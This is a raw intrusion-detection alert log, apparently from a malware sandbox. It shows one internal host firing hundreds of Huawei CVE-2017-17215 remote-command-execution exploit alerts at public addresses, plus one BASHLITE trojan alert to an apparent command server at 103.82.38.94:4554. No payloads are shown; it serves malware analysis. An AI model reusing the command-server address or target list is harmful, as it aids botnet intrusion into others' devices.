                                                        06/13/24-21:32:19.754364TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4375637215192.168.2.14156.27.71.111
                                                        06/13/24-21:32:34.216807TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5166037215192.168.2.14156.30.175.231
                                                        06/13/24-21:32:38.317599TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923237215192.168.2.14197.199.15.123
                                                        06/13/24-21:33:11.160507TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5414237215192.168.2.14156.28.228.216
                                                        06/13/24-21:32:28.027454TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5959237215192.168.2.14197.178.66.4
                                                        06/13/24-21:33:00.884814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5105837215192.168.2.14197.244.138.32
                                                        06/13/24-21:32:42.409722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5150037215192.168.2.1441.158.104.148
                                                        06/13/24-21:32:48.570978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881837215192.168.2.14197.167.91.128
                                                        06/13/24-21:32:50.632749TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3669037215192.168.2.1441.169.48.109
                                                        06/13/24-21:33:09.088821TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411037215192.168.2.14197.180.156.179
                                                        06/13/24-21:33:00.868839TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195237215192.168.2.1441.126.104.39
                                                        06/13/24-21:32:05.345559TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4829237215192.168.2.14197.95.202.248
                                                        06/13/24-21:32:56.755730TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3306637215192.168.2.14156.135.235.197
                                                        06/13/24-21:33:00.885239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838837215192.168.2.1441.243.253.56
                                                        06/13/24-21:31:59.195706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3743837215192.168.2.14197.218.101.123
                                                        06/13/24-21:32:09.456861TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229437215192.168.2.14197.254.59.131
                                                        06/13/24-21:32:03.276833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4551437215192.168.2.14197.235.36.247
                                                        06/13/24-21:31:57.093854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4845837215192.168.2.14156.161.214.109
                                                        06/13/24-21:32:17.702465TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4469437215192.168.2.14156.40.254.40
                                                        06/13/24-21:32:52.669371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769437215192.168.2.1441.140.105.61
                                                        06/13/24-21:32:01.237747TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5677837215192.168.2.1441.179.113.114
                                                        06/13/24-21:31:57.090759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6030037215192.168.2.14156.226.12.30
                                                        06/13/24-21:33:09.088278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944237215192.168.2.14156.243.104.8
                                                        06/13/24-21:32:01.246193TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5788637215192.168.2.1441.232.52.197
                                                        06/13/24-21:32:46.501879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6093237215192.168.2.1441.109.211.53
                                                        06/13/24-21:32:58.819878TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360837215192.168.2.14156.163.180.164
                                                        06/13/24-21:32:19.753508TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4200837215192.168.2.1441.54.92.8
                                                        06/13/24-21:31:57.152772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639437215192.168.2.14197.163.91.156
                                                        06/13/24-21:32:52.676889TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5539237215192.168.2.14156.23.36.119
                                                        06/13/24-21:33:09.108194TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5829837215192.168.2.1441.45.94.203
                                                        06/13/24-21:33:07.057475TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3789237215192.168.2.14156.212.199.93
                                                        06/13/24-21:31:59.196588TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513237215192.168.2.14156.249.24.102
                                                        06/13/24-21:32:13.570311TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4695837215192.168.2.14197.13.28.12
                                                        06/13/24-21:33:02.936607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4965237215192.168.2.14156.238.18.75
                                                        06/13/24-21:33:07.039213TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3721037215192.168.2.14197.226.63.136
                                                        06/13/24-21:33:15.274530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4285037215192.168.2.14197.228.11.78
                                                        06/13/24-21:33:09.110826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3431637215192.168.2.14197.242.158.54
                                                        06/13/24-21:32:25.977646TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4249037215192.168.2.1441.14.102.93
                                                        06/13/24-21:33:04.994290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5565437215192.168.2.14156.158.78.118
                                                        06/13/24-21:32:25.975308TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5558037215192.168.2.14156.224.136.197
                                                        06/13/24-21:32:58.839383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5761237215192.168.2.14197.177.4.236
                                                        06/13/24-21:32:34.191715TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4537037215192.168.2.14156.186.202.171
                                                        06/13/24-21:31:59.194950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5634037215192.168.2.1441.98.175.117
                                                        06/13/24-21:32:34.199473TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5137837215192.168.2.14156.146.176.98
                                                        06/13/24-21:31:57.092305TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3498637215192.168.2.14156.229.85.49
                                                        06/13/24-21:32:01.224908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4789637215192.168.2.14197.234.225.61
                                                        06/13/24-21:32:17.677315TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4360637215192.168.2.14197.164.213.131
                                                        06/13/24-21:32:15.610012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3482037215192.168.2.14156.70.249.254
                                                        06/13/24-21:32:05.345935TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4749637215192.168.2.14197.235.142.34
                                                        06/13/24-21:32:38.303310TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3338637215192.168.2.14197.32.154.214
                                                        06/13/24-21:32:17.695630TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5206637215192.168.2.14156.83.181.38
                                                        06/13/24-21:32:25.969477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3955637215192.168.2.14197.131.189.131
                                                        06/13/24-21:32:44.451355TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4790237215192.168.2.1441.69.231.99
                                                        06/13/24-21:32:56.788477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4789637215192.168.2.1441.33.145.55
                                                        06/13/24-21:32:52.676780TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4340037215192.168.2.1441.209.63.235
                                                        06/13/24-21:32:09.455850TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4619837215192.168.2.1441.236.179.83
                                                        06/13/24-21:32:11.488056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5870437215192.168.2.14156.50.128.249
                                                        06/13/24-21:32:25.974255TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5614637215192.168.2.1441.65.205.1
                                                        06/13/24-21:32:40.356840TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862437215192.168.2.1441.28.175.6
                                                        06/13/24-21:32:52.678958TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3777637215192.168.2.14197.197.78.241
                                                        06/13/24-21:33:02.912528TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3920237215192.168.2.14156.239.255.151
                                                        06/13/24-21:32:25.992633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5373437215192.168.2.14156.219.161.229
                                                        06/13/24-21:32:54.710502TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3316437215192.168.2.14156.173.137.60
                                                        06/13/24-21:33:05.013753TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3384637215192.168.2.14156.110.19.23
                                                        06/13/24-21:32:28.027456TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3683837215192.168.2.1441.212.253.188
                                                        06/13/24-21:33:09.110354TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5705837215192.168.2.1441.171.237.18
                                                        06/13/24-21:32:23.940449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5747637215192.168.2.1441.190.24.102
                                                        06/13/24-21:32:09.438622TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4159037215192.168.2.14197.154.217.110
                                                        06/13/24-21:32:52.669606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3648837215192.168.2.14156.203.24.246
                                                        06/13/24-21:32:23.943855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4511237215192.168.2.14197.61.243.252
                                                        06/13/24-21:32:58.824338TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4911237215192.168.2.14197.250.17.36
                                                        06/13/24-21:33:02.935597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4714437215192.168.2.14156.114.72.14
                                                        06/13/24-21:32:05.348831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5673437215192.168.2.1441.55.64.243
                                                        06/13/24-21:32:58.842402TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5714437215192.168.2.1441.106.22.97
                                                        06/13/24-21:32:44.457601TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4981437215192.168.2.14197.191.50.136
                                                        06/13/24-21:33:17.305206TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867637215192.168.2.14156.10.213.227
                                                        06/13/24-21:32:13.544695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4884237215192.168.2.14156.183.179.234
                                                        06/13/24-21:33:00.872038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6082037215192.168.2.14197.149.27.8
                                                        06/13/24-21:32:21.802338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390237215192.168.2.1441.237.92.54
                                                        06/13/24-21:32:52.677124TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380237215192.168.2.14197.32.236.117
                                                        06/13/24-21:31:59.174661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734237215192.168.2.1441.152.29.217
                                                        06/13/24-21:33:02.910280TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4536437215192.168.2.14156.119.253.166
                                                        06/13/24-21:32:34.212752TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5283037215192.168.2.14197.137.191.247
                                                        06/13/24-21:32:42.419463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5282437215192.168.2.14197.171.150.49
                                                        06/13/24-21:32:28.045743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4291837215192.168.2.14197.181.39.34
                                                        06/13/24-21:33:13.210838TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5286637215192.168.2.14156.115.99.201
                                                        06/13/24-21:32:50.613431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294237215192.168.2.14156.216.215.85
                                                        06/13/24-21:31:57.091307TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5193637215192.168.2.14156.77.138.79
                                                        06/13/24-21:32:13.545626TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5777237215192.168.2.14197.86.100.101
                                                        06/13/24-21:32:40.354241TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4640037215192.168.2.1441.220.176.2
                                                        06/13/24-21:32:48.551498TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6052637215192.168.2.14156.197.163.178
                                                        06/13/24-21:32:07.401290TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4195237215192.168.2.14156.54.33.198
                                                        06/13/24-21:32:12.302807TCP2840515ETPRO TROJAN ELF/BASHLITE Variant Reporting Arch Type (i586)476084554192.168.2.14103.82.38.94
                                                        06/13/24-21:32:54.711043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4342637215192.168.2.14156.148.177.211
                                                        06/13/24-21:32:54.724869TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066837215192.168.2.14156.155.91.27
                                                        06/13/24-21:32:46.502901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5850637215192.168.2.14197.203.11.122
                                                        06/13/24-21:33:09.102059TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4828637215192.168.2.1441.175.242.235
                                                        06/13/24-21:32:34.213732TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5455837215192.168.2.14156.205.232.147
                                                        06/13/24-21:32:50.613341TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3571637215192.168.2.14156.208.188.151
                                                        06/13/24-21:32:13.546007TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5392837215192.168.2.14156.227.84.10
                                                        06/13/24-21:32:50.611551TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5333837215192.168.2.14197.252.121.147
                                                        06/13/24-21:33:13.227610TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5126837215192.168.2.14197.229.127.167
                                                        06/13/24-21:32:54.708441TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5996637215192.168.2.1441.4.48.213
                                                        06/13/24-21:33:11.159837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5891037215192.168.2.1441.126.171.135
                                                        06/13/24-21:32:28.045687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5790437215192.168.2.14156.92.100.127
                                                        06/13/24-21:32:34.194964TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4334037215192.168.2.14156.126.228.81
                                                        06/13/24-21:32:30.074072TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3568037215192.168.2.14197.95.90.253
                                                        06/13/24-21:32:09.457722TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5993437215192.168.2.1441.81.255.144
                                                        06/13/24-21:32:30.126395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5998637215192.168.2.14156.178.121.155
                                                        06/13/24-21:32:48.570695TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3647237215192.168.2.14197.138.4.214
                                                        06/13/24-21:33:02.909085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593037215192.168.2.14197.92.121.38
                                                        06/13/24-21:32:50.629935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5042637215192.168.2.14156.138.46.169
                                                        06/13/24-21:33:04.990200TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3329437215192.168.2.14197.159.99.190
                                                        06/13/24-21:32:17.693831TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4102437215192.168.2.14156.243.188.145
                                                        06/13/24-21:33:13.230963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5248237215192.168.2.1441.207.148.56
                                                        06/13/24-21:33:02.911311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3658037215192.168.2.14197.164.98.238
                                                        06/13/24-21:32:09.458567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426437215192.168.2.14197.168.18.174
                                                        06/13/24-21:32:05.349538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.14156.192.101.18
                                                        06/13/24-21:33:11.155567TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3518837215192.168.2.14156.73.29.18
                                                        06/13/24-21:32:15.634536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4716837215192.168.2.1441.123.78.171
                                                        06/13/24-21:32:19.731338TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4026037215192.168.2.14197.75.84.113
                                                        06/13/24-21:32:09.437572TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4415437215192.168.2.14156.234.195.39
                                                        06/13/24-21:31:57.131827TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5565837215192.168.2.14156.163.7.110
                                                        06/13/24-21:33:11.160955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560837215192.168.2.14197.234.66.16
                                                        06/13/24-21:32:46.508581TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4330637215192.168.2.14197.213.177.220
                                                        06/13/24-21:32:32.155399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3293437215192.168.2.14156.136.75.125
                                                        06/13/24-21:32:46.501585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5236237215192.168.2.14197.167.64.25
                                                        06/13/24-21:33:13.210161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4751437215192.168.2.1441.143.65.126
                                                        06/13/24-21:32:46.523463TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3752837215192.168.2.14156.114.6.177
                                                        06/13/24-21:32:52.658425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5465437215192.168.2.14156.235.255.149
                                                        06/13/24-21:32:32.151276TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4572637215192.168.2.14197.192.134.222
                                                        06/13/24-21:32:48.555211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4088437215192.168.2.1441.197.14.64
                                                        06/13/24-21:32:19.731259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445037215192.168.2.14197.239.151.250
                                                        06/13/24-21:33:13.230550TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4826837215192.168.2.1441.48.159.130
                                                        06/13/24-21:31:59.176782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5123437215192.168.2.14156.184.148.27
                                                        06/13/24-21:32:11.507230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5590437215192.168.2.1441.215.251.70
                                                        06/13/24-21:32:38.320272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334437215192.168.2.14156.94.226.24
                                                        06/13/24-21:32:05.377030TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3945037215192.168.2.1441.98.125.28
                                                        06/13/24-21:32:48.573208TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5426037215192.168.2.14156.215.238.178
                                                        06/13/24-21:33:11.180808TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4110037215192.168.2.14197.184.207.219
                                                        06/13/24-21:32:52.657703TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4328237215192.168.2.14156.238.111.88
                                                        06/13/24-21:32:15.635066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4844637215192.168.2.14197.181.28.169
                                                        06/13/24-21:32:46.509705TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4056637215192.168.2.14197.31.118.121
                                                        06/13/24-21:32:38.318247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3651037215192.168.2.14156.25.164.160
                                                        06/13/24-21:32:11.507465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5628237215192.168.2.14197.198.74.142
                                                        06/13/24-21:32:17.697582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3553437215192.168.2.14156.165.31.22
                                                        06/13/24-21:32:30.098937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5134037215192.168.2.14197.4.111.153
                                                        06/13/24-21:32:40.355527TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497437215192.168.2.14156.121.160.112
                                                        06/13/24-21:32:40.379465TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5170837215192.168.2.1441.67.62.213
                                                        06/13/24-21:32:05.370631TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5774637215192.168.2.14197.172.142.126
                                                        06/13/24-21:32:11.488877TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3612437215192.168.2.14156.182.9.188
                                                        06/13/24-21:32:07.403936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4250437215192.168.2.14197.42.253.191
                                                        06/13/24-21:32:03.305342TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5791437215192.168.2.14197.9.104.150
                                                        06/13/24-21:32:40.372818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158637215192.168.2.1441.237.127.151
                                                        06/13/24-21:31:57.092072TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4552837215192.168.2.1441.203.92.245
                                                        06/13/24-21:32:40.377196TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3727837215192.168.2.1441.127.58.71
                                                        06/13/24-21:32:07.402598TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4190437215192.168.2.14197.84.65.3
                                                        06/13/24-21:31:57.133875TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5198637215192.168.2.1441.7.126.212
                                                        06/13/24-21:32:01.220772TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3355037215192.168.2.1441.122.183.100
                                                        06/13/24-21:32:52.677408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5207237215192.168.2.14156.64.155.13
                                                        06/13/24-21:32:50.614228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4809637215192.168.2.14156.124.190.155
                                                        06/13/24-21:32:13.546458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5023237215192.168.2.1441.220.226.172
                                                        06/13/24-21:32:25.993909TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4262837215192.168.2.14156.101.89.162
                                                        06/13/24-21:32:40.359168TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3863037215192.168.2.14156.218.65.132
                                                        06/13/24-21:32:28.023353TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5497237215192.168.2.14156.2.88.154
                                                        06/13/24-21:32:11.509916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3340637215192.168.2.1441.233.7.74
                                                        06/13/24-21:32:30.078179TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4594437215192.168.2.1441.95.156.255
                                                        06/13/24-21:32:40.376549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5290837215192.168.2.14197.148.141.10
                                                        06/13/24-21:32:21.786207TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5053237215192.168.2.14197.76.99.244
                                                        06/13/24-21:32:40.359373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4901437215192.168.2.1441.24.8.15
                                                        06/13/24-21:31:59.194620TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5280437215192.168.2.1441.111.224.37
                                                        06/13/24-21:32:42.406352TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5205637215192.168.2.14197.158.113.222
                                                        06/13/24-21:33:17.303795TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4841037215192.168.2.14197.25.146.217
                                                        06/13/24-21:33:15.253083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4087837215192.168.2.14156.25.214.39
                                                        06/13/24-21:32:48.556026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6071637215192.168.2.14197.8.213.142
                                                        06/13/24-21:32:25.975002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3629837215192.168.2.14156.146.190.125
                                                        06/13/24-21:32:30.128690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703437215192.168.2.1441.6.251.247
                                                        06/13/24-21:33:13.228636TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5485437215192.168.2.14156.49.54.8
                                                        06/13/24-21:32:32.154819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5256837215192.168.2.14197.29.125.99
                                                        06/13/24-21:32:42.403689TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5140237215192.168.2.14197.198.65.77
                                                        06/13/24-21:32:48.554712TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5696237215192.168.2.14197.172.178.63
                                                        06/13/24-21:31:57.090953TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3928437215192.168.2.14197.112.240.206
                                                        06/13/24-21:33:11.174832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4909037215192.168.2.1441.39.210.121
                                                        06/13/24-21:33:09.108057TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827037215192.168.2.14156.202.227.49
                                                        06/13/24-21:33:09.084760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4524637215192.168.2.14156.47.186.24
                                                        06/13/24-21:32:34.213283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4334037215192.168.2.14156.73.155.191
